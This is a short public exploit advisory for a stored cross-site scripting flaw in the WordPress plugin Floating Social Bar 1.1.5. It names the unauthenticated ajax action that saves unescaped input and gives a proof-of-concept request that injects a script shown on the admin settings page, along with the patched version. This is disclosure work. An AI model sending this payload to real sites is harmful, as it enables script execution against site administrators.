WordPress Floating Social Bar version 1.1.5 suffers from a cross site scripting vulnerability.
e3d25f5373a83dae455e18baf666848ac55bb72a48e1200252f0f83bc659910d
# Exploit Title: Floating Social Bar 1.1.5 XSS
# Date: 09-01-2015
# Software Link: https://wordpress.org/plugins/floating-social-bar/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Everyone can access save_order().
File: floating-social-bar\class-floating-social-bar.php
add_action( 'wp_ajax_nopriv_fsb_save_order', array( $this, 'save_order' ) );
$_REQUEST['items'] is not escaped.
http://security.szurek.pl/floating-social-bar-115-xss.html
2. Proof of Concept
http://wordpress-url/wp-admin/admin-ajax.php?action=fsb_save_order&items[1]="><script>alert("XSS");</script>
XSS will be visible for admin:
http://wordpress-url/wp-admin/options-general.php?page=floating-social-bar
3. Solution:
Update to version 1.1.6